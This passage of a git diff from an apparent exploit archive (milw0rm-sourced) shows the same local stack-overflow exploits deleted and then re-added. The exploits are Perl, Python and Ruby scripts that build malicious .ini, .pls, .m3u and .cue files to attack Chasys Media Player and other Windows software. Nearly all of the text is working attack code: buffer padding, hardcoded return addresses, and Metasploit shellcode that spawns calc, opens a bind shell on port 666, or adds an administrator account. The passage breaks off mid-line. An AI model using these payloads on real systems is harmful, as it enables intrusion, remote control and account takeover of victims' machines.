"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" . + "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" . + "\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" . + "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" . + "\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" . + "\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" . + "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" . + "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" . + "\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" . + "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" . + "\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" . + "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" . + "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" . + "\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" . + "\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" . + "\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" . + "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" . + "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" . + "\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" . + "\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" . + "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" . + "\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" . + "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" . + "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" . + "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" . + "\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" . + "\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" . + "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" . + "\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" . + "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" . + "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" . + "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" . + "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" . + "\x4f\x4f\x42\x4d\x5a"; + +$filename = $ARGV[0]; +$target = $ARGV[1]; + +if(!defined($filename) || !defined($target)) +{ + + print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]\n"; + +} + +if($target == "1") { $retaddr = pack('l', $win2ksp4); } +if($target == "2") { $retaddr = pack('l', $winxpsp3); } + +$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508 + + open(FILE, '>' . $filename); + print FILE $payload; + close(FILE); + +exit; + +# milw0rm.com [2009-01-07] diff --git a/platforms/windows/local/8233.py b/platforms/windows/local/8233.py index 62de32585..6f43db34d 100755 --- a/platforms/windows/local/8233.py +++ b/platforms/windows/local/8233.py @@ -1,62 +1,62 @@ -#usage: exploit.py -print "**************************************************************************" -print " Chasys Media Player(pls File) Local Stack overflow Exploit\n" -print " Founder: zAx my friend :)" -print " Exploited by : His0k4" -print " Tested on: Windows XP Pro SP2 Fr\n" -print " Good news : The program didn't crash after running the exploit :)" -print " Greetings to:" -print " All friends & muslims HaCkers(dz)\n" -print "**************************************************************************" - - - -header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A" -header += "\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74" -header += "\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65" -header += "\x31\x3D" - - -buff1 = "\x41" * 260 - -eip = "\x5D\x38\x82\x7C" # call esp kernel32.dll - - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode=( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" -"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x37" -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" -"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58" -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48" -"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x34" -"\x4b\x38\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x38" -"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x53" -"\x42\x4c\x46\x36\x4b\x48\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x57" -"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x31\x4d\x4a" -"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" -"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x53" -"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x47" -"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x59" -"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56" -"\x4e\x36\x43\x36\x42\x50\x5a") - - - -exploit = header + buff1 + eip + shellcode # klimontayne fe romayne :D - -try: - out_file = open("exploit.pls",'w') - out_file.write(exploit) - out_file.close() - print "Exploit File Created!" -except: - print "Error" - -# milw0rm.com [2009-03-18] +#usage: exploit.py +print "**************************************************************************" +print " Chasys Media Player(pls File) Local Stack overflow Exploit\n" +print " Founder: zAx my friend :)" +print " Exploited by : His0k4" +print " Tested on: Windows XP Pro SP2 Fr\n" +print " Good news : The program didn't crash after running the exploit :)" +print " Greetings to:" +print " All friends & muslims HaCkers(dz)\n" +print "**************************************************************************" + + + +header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A" +header += "\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74" +header += "\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65" +header += "\x31\x3D" + + +buff1 = "\x41" * 260 + +eip = "\x5D\x38\x82\x7C" # call esp kernel32.dll + + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode=( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" +"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x37" +"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" +"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58" +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" +"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48" +"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x34" +"\x4b\x38\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x38" +"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x53" +"\x42\x4c\x46\x36\x4b\x48\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x57" +"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x31\x4d\x4a" +"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" +"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x53" +"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x47" +"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x59" +"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56" +"\x4e\x36\x43\x36\x42\x50\x5a") + + + +exploit = header + buff1 + eip + shellcode # klimontayne fe romayne :D + +try: + out_file = open("exploit.pls",'w') + out_file.write(exploit) + out_file.close() + print "Exploit File Created!" +except: + print "Error" + +# milw0rm.com [2009-03-18] diff --git a/platforms/windows/local/8234.py b/platforms/windows/local/8234.py index 97fe2245a..ff9c765c4 100755 --- a/platforms/windows/local/8234.py +++ b/platforms/windows/local/8234.py @@ -1,50 +1,50 @@ -#!/usr/bin/python -# Chasys Media Player 1.1 (.pls) Stack Overflow Exploit -# By: Encrypt3d.M!nd -# -# Credit flys to: zAx -# -# the good thing in this one that the program won't crash -# when the playlist file imported,and will keep running. - - -header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D" -junk = "\x41"*260 - -eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2 - -nops = "\x90" * 20 - - -# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub -http://metasploit.com -shellcode = ( -"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77" -"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb" -"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f" -"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d" -"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c" -"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff" -"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f" -"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44" -"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4" -"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16" -"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47" -"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5" -"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c" -"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d" -"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43" -"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44" -"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39" -"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb" -"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45" -"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4" -"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b" -"\x24\xec\xe3\xeb\xa7\x13\x35\x14") - -ex = header+junk+eip+nops+shellcode -file=open("devil_inside.pls","w") -file.write(ex) -file.close() - -# milw0rm.com [2009-03-18] +#!/usr/bin/python +# Chasys Media Player 1.1 (.pls) Stack Overflow Exploit +# By: Encrypt3d.M!nd +# +# Credit flys to: zAx +# +# the good thing in this one that the program won't crash +# when the playlist file imported,and will keep running. + + +header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65\x31\x3D" +junk = "\x41"*260 + +eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2 + +nops = "\x90" * 20 + + +# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub +http://metasploit.com +shellcode = ( +"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77" +"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb" +"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f" +"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d" +"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c" +"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff" +"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f" +"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44" +"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4" +"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16" +"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47" +"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5" +"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c" +"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d" +"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43" +"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44" +"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39" +"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb" +"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45" +"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4" +"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b" +"\x24\xec\xe3\xeb\xa7\x13\x35\x14") + +ex = header+junk+eip+nops+shellcode +file=open("devil_inside.pls","w") +file.write(ex) +file.close() + +# milw0rm.com [2009-03-18] diff --git a/platforms/windows/local/8235.py b/platforms/windows/local/8235.py index 6714f05cd..2c5816cef 100755 --- a/platforms/windows/local/8235.py +++ b/platforms/windows/local/8235.py @@ -1,50 +1,50 @@ -#!/usr/bin/python -# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit -# By: Encrypt3d.M!nd -# -# Credit flys to: zAx -# -# the good thing in this one that the program won't crash -# when the playlist file imported,and will keep running. - - -header = "#EXTM3U\n" -junk = "\x41"*260 - -eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2 - -nops = "\x90" * 20 - - -# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub -http://metasploit.com -shellcode = ( -"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77" -"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb" -"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f" -"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d" -"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c" -"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff" -"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f" -"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44" -"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4" -"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16" -"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47" -"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5" -"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c" -"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d" -"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43" -"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44" -"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39" -"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb" -"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45" -"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4" -"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b" -"\x24\xec\xe3\xeb\xa7\x13\x35\x14") - -ex = header+junk+eip+nops+shellcode -file=open("devil_inside.m3u","w") -file.write(ex) -file.close() - -# milw0rm.com [2009-03-18] +#!/usr/bin/python +# Chasys Media Player 1.1 (.m3u) Stack Overflow Exploit +# By: Encrypt3d.M!nd +# +# Credit flys to: zAx +# +# the good thing in this one that the program won't crash +# when the playlist file imported,and will keep running. + + +header = "#EXTM3U\n" +junk = "\x41"*260 + +eip = "\x2b\x2a\x49\x7e" #user32.dll win/xp sp2 + +nops = "\x90" * 20 + + +# win32_bind - EXITFUNC=seh LPORT=666 Size=344 Encoder=PexFnstenvSub +http://metasploit.com +shellcode = ( +"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77" +"\x13\x35\x14\x83\xeb\xfc\xe2\xf4\x8b\x79\xde\x59\x9f\xea\xca\xeb" +"\x88\x73\xbe\x78\x53\x37\xbe\x51\x4b\x98\x49\x11\x0f\x12\xda\x9f" +"\x38\x0b\xbe\x4b\x57\x12\xde\x5d\xfc\x27\xbe\x15\x99\x22\xf5\x8d" +"\xdb\x97\xf5\x60\x70\xd2\xff\x19\x76\xd1\xde\xe0\x4c\x47\x11\x3c" +"\x02\xf6\xbe\x4b\x53\x12\xde\x72\xfc\x1f\x7e\x9f\x28\x0f\x34\xff" +"\x74\x3f\xbe\x9d\x1b\x37\x29\x75\xb4\x22\xee\x70\xfc\x50\x05\x9f" +"\x37\x1f\xbe\x64\x6b\xbe\xbe\x54\x7f\x4d\x5d\x9a\x39\x1d\xd9\x44" +"\x88\xc5\x53\x47\x11\x7b\x06\x26\x1f\x64\x46\x26\x28\x47\xca\xc4" +"\x1f\xd8\xd8\xe8\x4c\x43\xca\xc2\x28\x9a\xd0\x72\xf6\xfe\x3d\x16" +"\x22\x79\x37\xeb\xa7\x7b\xec\x1d\x82\xbe\x62\xeb\xa1\x40\x66\x47" +"\x24\x40\x76\x47\x34\x40\xca\xc4\x11\x7b\x37\x8e\x11\x40\xbc\xf5" +"\xe2\x7b\x91\x0e\x07\xd4\x62\xeb\xa1\x79\x25\x45\x22\xec\xe5\x7c" +"\xd3\xbe\x1b\xfd\x20\xec\xe3\x47\x22\xec\xe5\x7c\x92\x5a\xb3\x5d" +"\x20\xec\xe3\x44\x23\x47\x60\xeb\xa7\x80\x5d\xf3\x0e\xd5\x4c\x43" +"\x88\xc5\x60\xeb\xa7\x75\x5f\x70\x11\x7b\x56\x79\xfe\xf6\x5f\x44" +"\x2e\x3a\xf9\x9d\x90\x79\x71\x9d\x95\x22\xf5\xe7\xdd\xed\x77\x39" +"\x89\x51\x19\x87\xfa\x69\x0d\xbf\xdc\xb8\x5d\x66\x89\xa0\x23\xeb" +"\x02\x57\xca\xc2\x2c\x44\x67\x45\x26\x42\x5f\x15\x26\x42\x60\x45" +"\x88\xc3\x5d\xb9\xae\x16\xfb\x47\x88\xc5\x5f\xeb\x88\x24\xca\xc4" +"\xfc\x44\xc9\x97\xb3\x77\xca\xc2\x25\xec\xe5\x7c\x87\x99\x31\x4b" +"\x24\xec\xe3\xeb\xa7\x13\x35\x14") + +ex = header+junk+eip+nops+shellcode +file=open("devil_inside.m3u","w") +file.write(ex) +file.close() + +# milw0rm.com [2009-03-18] diff --git a/platforms/windows/local/8242.rb b/platforms/windows/local/8242.rb index 58c885815..204e40fe1 100755 --- a/platforms/windows/local/8242.rb +++ b/platforms/windows/local/8242.rb @@ -1,72 +1,72 @@ -#!/usr/bin/env ruby -# Chasys Media Player 1.1 .cue file Stack Overflow Exploit -# By Stack -# Mountassif Moad -# cat thnx.txt -# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d -# -time3 = Time.new -puts "Exploit Started in Current Time :" + time3.inspect -puts "Enter Name For your File Like : Stack" -files = gets.chomp.capitalize -puts "Name Of File : " + files +'.cue' -time1 = Time.new -$VERBOSE=nil -Header1= "\x5B\x70\x6C\x61\x79\x6C\x69"+ - "\x73\x74\x5D\x0D\x46\x69\x6C"+ - "\x65\x31\x3D" - - -Header2= "\x0D\x0A\x54\x52\x41\x43\x4B\x20\x30\x31\x20\x4D\x4F\x44\x45\x31\x2F\x32"+ - "\x33\x35\x32\x0D\x0A\x20\x20\x20\x49\x4E\x44\x45\x58\x20\x30\x31"+ - "\x20\x30\x30\x3A\x30\x30\x3A\x30\x30" - - -# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com -Shellscode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+ -"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+ -"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+ -"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+ -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+ -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+ -"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+ -"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+ -"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+ -"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+ -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+ -"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+ -"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+ -"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+ -"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+ -"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+ -"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+ -"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+ -"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+ -"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+ -"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+ -"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+ -"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+ -"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+ -"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+ -"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+ -"\x41\x54\x46\x54\x46\x54\x42\x50\x5a" -Over = "\x41" * 260 -Nop = "\x90" * 20 -Ret = "\x5D\x38\x82\x7C" # CALL ESP kernel32.dll Sp 2 FR & EN - # "\x35\x16\x39\x77" # CALL ESP Universel If box Have .Net 2 - # ( this is my methode if i dont find an universel address in app i find adress - # in some famouse softwar who the victime 90 % install it ) - -Xpl = Header1 + Over + Ret + Nop + 